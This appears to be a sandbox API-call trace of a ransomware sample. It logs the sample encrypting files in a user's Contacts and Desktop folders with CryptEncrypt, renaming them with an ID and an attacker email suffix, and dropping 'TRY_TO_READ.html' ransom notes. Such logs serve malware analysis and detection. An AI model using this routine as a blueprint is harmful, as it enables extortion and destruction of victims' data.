	[0099.608] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.609] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.609] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.609] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x493) returned 0x5fb388
	[0099.609] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x493) returned 0x3a20048
	[0099.609] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.609] ReadFile (in: hFile=0x37c, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x493, lpOverlapped=0x0) returned 1
	[0099.609] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.609] WriteFile (in: hFile=0x37c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x493, lpOverlapped=0x0) returned 1
	[0099.609] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0099.609] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0099.610] CloseHandle (hObject=0x37c) returned 1
	[0099.610] GetProcessHeap () returned 0x540000
	[0099.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5893c0 | out: hHeap=0x540000) returned 1
	[0099.610] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5894d0 | out: hHeap=0x540000) returned 1
	[0099.610] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0099.610] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.610] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.610] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.611] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.611] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1
	[0099.611] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 61
	[0099.611] GetProcessHeap () returned 0x540000
	[0099.611] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x598b60
	[0099.611] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact"
	[0099.611] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.611] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.613] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.613] GetProcessHeap () returned 0x540000
	[0099.613] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.613] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=68382) returned 1
	[0099.614] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10b1e
	[0099.614] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.614] GetProcessHeap () returned 0x540000
	[0099.614] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.614] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.614] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.615] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.615] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.616] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b1e) returned 0x5febb8
	[0099.616] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b1e) returned 0x60f6e0
	[0099.616] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.616] ReadFile (in: hFile=0x37c, lpBuffer=0x5febb8, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5febb8*, lpNumberOfBytesRead=0x3a1f778*=0x10b1e, lpOverlapped=0x0) returned 1
	[0099.619] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.619] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.619] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1
	[0099.620] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 63
	[0099.620] GetProcessHeap () returned 0x540000
	[0099.620] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x598b60
	[0099.620] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact"
	[0099.620] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.620] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.622] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.622] GetProcessHeap () returned 0x540000
	[0099.622] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.622] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1178) returned 1
	[0099.623] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x49a
	[0099.623] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.623] GetProcessHeap () returned 0x540000
	[0099.623] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.623] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.623] WriteFile (in: hFile=0x37c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.624] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.624] WriteFile (in: hFile=0x37c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.634] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x49a) returned 0x5fb388
	[0099.634] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x49a) returned 0x3a20048
	[0099.634] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.634] ReadFile (in: hFile=0x37c, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x49a, lpOverlapped=0x0) returned 1
	[0099.634] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.634] WriteFile (in: hFile=0x37c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x49a, lpOverlapped=0x0) returned 1
	[0099.634] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0099.634] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0099.634] CloseHandle (hObject=0x37c) returned 1
	[0099.635] GetProcessHeap () returned 0x540000
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589558 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0099.635] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9430
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b7e0 | out: hHeap=0x540000) returned 1
	[0099.635] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0099.635] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9430 | out: hHeap=0x540000) returned 1
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b838 | out: hHeap=0x540000) returned 1
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53a0 | out: hHeap=0x540000) returned 1
	[0099.636] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4f0
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.636] GetLastError () returned 0x5
	[0099.636] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.636] GetLastError () returned 0x5
	[0099.636] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a66880, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xb0a66880, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xadab7800, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5e600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3.exe", cAlternateFileName="")) returned 1
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.636] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.636] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.636] GetLastError () returned 0x5
	[0099.636] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16098e30, ftCreationTime.dwHighDateTime=0x1d4c879, ftLastAccessTime.dwLowDateTime=0xd3a5fa30, ftLastAccessTime.dwHighDateTime=0x1d4d078, ftLastWriteTime.dwLowDateTime=0xd3a5fa30, ftLastWriteTime.dwHighDateTime=0x1d4d078, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="62H32YjLe.odt", cAlternateFileName="62H32Y~1.ODT")) returned 1
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.637] GetLastError () returned 0x5
	[0099.637] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d8d69d0, ftCreationTime.dwHighDateTime=0x1d4c8c1, ftLastAccessTime.dwLowDateTime=0x291d19c0, ftLastAccessTime.dwHighDateTime=0x1d4c832, ftLastWriteTime.dwLowDateTime=0x291d19c0, ftLastWriteTime.dwHighDateTime=0x1d4c832, nFileSizeHigh=0x0, nFileSizeLow=0x1ee0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6AvS1QjHN9JCOKgT2I3.m4a", cAlternateFileName="6AVS1Q~1.M4A")) returned 1
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.637] GetLastError () returned 0x5
	[0099.637] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179c60d0, ftCreationTime.dwHighDateTime=0x1d4cd27, ftLastAccessTime.dwLowDateTime=0x24a16c60, ftLastAccessTime.dwHighDateTime=0x1d4d409, ftLastWriteTime.dwLowDateTime=0x24a16c60, ftLastWriteTime.dwHighDateTime=0x1d4d409, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A0d8C0PI1aL", cAlternateFileName="A0D8C0~1")) returned 1
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.637] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.637] GetLastError () returned 0x5
	[0099.637] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.638] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fbf0 | out: hHeap=0x540000) returned 1
	[0099.638] WriteFile (in: hFile=0x384, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0099.639] WriteFile (in: hFile=0x384, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0099.639] WriteFile (in: hFile=0x384, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0099.639] CloseHandle (hObject=0x384) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596400 | out: hHeap=0x540000) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.639] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf854f40, ftCreationTime.dwHighDateTime=0x1d4d503, ftLastAccessTime.dwLowDateTime=0xdb78d9e0, ftLastAccessTime.dwHighDateTime=0x1d4ca28, ftLastWriteTime.dwLowDateTime=0xdb78d9e0, ftLastWriteTime.dwHighDateTime=0x1d4ca28, nFileSizeHigh=0x0, nFileSizeLow=0x121c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b35j2h6zurxQ.mkv", cAlternateFileName="B35J2H~1.MKV")) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.639] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.639] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.639] GetLastError () returned 0x0
	[0099.639] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.639] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.639] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.639] GetLastError () returned 0x0
